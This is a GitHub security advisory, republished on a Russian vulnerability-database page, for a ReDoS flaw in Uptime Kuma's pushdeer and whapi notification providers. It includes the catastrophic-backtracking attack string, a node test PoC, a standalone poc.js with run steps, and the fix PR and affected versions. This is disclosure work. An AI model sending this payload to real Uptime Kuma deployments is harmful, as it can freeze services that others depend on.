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Опубликовано: 31 мар. 2025
Источник: github
Github: Прошло ревью
CVSS4: 6.7

Описание

Uptime Kuma's Regular Expression in pushdeeer and whapi file Leads to ReDoS Vulnerability Due to Catastrophic Backtracking

Summary

There is a ReDoS vulnerability risk in the system, specifically when administrators create notification through the web service(pushdeer and whapi). If a string is provided that triggers catastrophic backtracking in the regular expression, it may lead to a ReDoS attack.

Details

The regular expression \/*$\ is used to match zero or more slashes / at the end of a URL. When a malicious attack string appends a large number of slashes / and a non-slash character at the end of the URL, the regular expression enters a backtracking matching process. During this process, the regular expression engine starts checking each slash from the first one, continuing until it encounters the last non-slash character. Due to the greedy matching nature of the regular expression, this process repeats itself, with each backtrack checking the next slash until the last slash is checked. This backtracking process consumes significant CPU resources.

.replace(/\/*$/, "")

For the regular expression /\/*$/, an attack string like

"https://e" + "/".repeat(100000) + "@"

can trigger catastrophic backtracking, causing the web service to freeze and potentially leading to a ReDoS attack.

When entered from the web interface, the attack string needs to expand "/".repeat(100000) and be input directly, such as https://e/////////..//@. This triggers catastrophic backtracking, leading to web service lag and posing a potential ReDoS attack risk.

PoC

The poc.js is in: https://gist.github.com/ShiyuBanzhou/26c918f93b07f5ce90e8f7000d29c7a0 The time lag phenomenon can be observed through test-pushdeer-ReDos, which helps verify the presence of the ReDoS attack:

const semver = require("semver"); let test; const nodeVersion = process.versions.node; if (semver.satisfies(nodeVersion, ">= 18")) { test = require("node:test"); } else { test = require("test"); } const PushDeer = require("../../server/notification-providers/pushdeer.js"); const assert = require("node:assert"); test("Test ReDos - attack string", async (t) => { const pushDeer = new PushDeer(); const notification = { pushdeerServer: "https://e" + "/".repeat(100000) + "@", }; const msg = "Test Attacking"; const startTime = performance.now(); try { pushDeer.send(notification, msg) } catch (error) { // pass } const endTime = performance.now(); const elapsedTime = endTime - startTime; const reDosThreshold = 2000; assert(elapsedTime <= reDosThreshold, `🚨 Potential ReDoS Attack! send method took ${elapsedTime.toFixed(2)} ms, exceeding threshold of ${reDosThreshold} ms.`); });

Move the test-uptime-calculator.js file to the ./uptime-kuma/test/backend-test folder and run npm run test-backend to execute the backend tests.

Trigger conditions for whapi jams, In the send function within the uptime-kuma\server\notification-providers\pushdeer.js file: https://gist.github.com/ShiyuBanzhou/bf4cee61603e152c114fa8c4791f9f28

// The attack string "httpS://example" + "/".repeat(100000) + "@" // poc.js // Import the target file const Whapi = require("./uptime-kuma/server/notification-providers/whapi"); // Create an instance of Whapi const whapi = new Whapi(); const notification = { whapiApiUrl: "https://e" + "/".repeat(100000) + "@", }; // console.log(`${notification.whapiApiUrl}`); // Define the message to be sent const msg = "Test Attacking"; // Call the send method and handle exceptions whapi.send(notification, msg) // 1-5 are the original installation methods for the project // 6-8 are attack methods // --- // 1.run `git clone https://github.com/louislam/uptime-kuma.git` // 2.run `cd uptime-kuma` // 3.run `npm run setup` // 4.run `npm install pm2 -g && pm2 install pm2-logrotate` // 5.run `pm2 start server/server.js --name uptime-kuma` // --- // 6.Run npm install in the root directory of the same level as `README.md` // 7.Move `poc.js` to the root directory of the same level as `README.md` // 8.and then run `node poc.js`

After running, a noticeable lag can be observed, with the regular expression matching time increasing from a few milliseconds to over 2000 milliseconds. redos

You can also perform this attack on the web interface. By timing the operation, it can be observed that the lag still occurs. The key to the attack string is appending a large number of / to the URL, followed by a non-/ character at the end, entered directly.

1 webserver

Impact

What kind of vulnerability is it?

This is a Regular Expression Denial of Service (ReDoS) vulnerability. ReDoS exploits poorly designed regular expressions that can lead to excessive backtracking under certain input conditions, causing the affected application to consume high CPU and memory resources. This can result in significant performance degradation or complete service unavailability, especially when processing specially crafted attack strings.

Who is impacted?

  1. Uptime Kuma users: Any users or administrators running the Uptime Kuma project are potentially affected, especially if they allow untrusted input through the web interface or notification services like pushdeer.js and whapi.js. Attackers can exploit this vulnerability by injecting crafted strings into the input fields.

  2. Web services and hosting providers: If Uptime Kuma is deployed in a production environment, the vulnerability could impact hosting providers or servers running the application, leading to downtime, degraded performance, or resource exhaustion.

Solution

@louislam I have provided a solution for you to check:https://github.com/louislam/uptime-kuma/pull/5573

Пакеты

Наименование

uptime-kuma

npm
Затронутые версииВерсия исправления

>= 1.15.0, <= 1.23.16

Отсутствует

Наименование

uptime-kuma

npm
Затронутые версииВерсия исправления

>= 2.0.0-beta.0, < 2.0.0-beta.2

2.0.0-beta.2

EPSS

Процентиль: 9%
0.00034
Низкий

6.7 Medium

CVSS4

Дефекты

CWE-1333

Связанные уязвимости

CVSS3: 6
nvd
11 месяцев назад

Uptime Kuma >== 1.23.0 has a ReDoS vulnerability, specifically when an administrator creates a notification through the web service. If a string is provided it triggers catastrophic backtracking in the regular expression, leading to a ReDoS attack.

EPSS

Процентиль: 9%
0.00034
Низкий

6.7 Medium

CVSS4

Дефекты

CWE-1333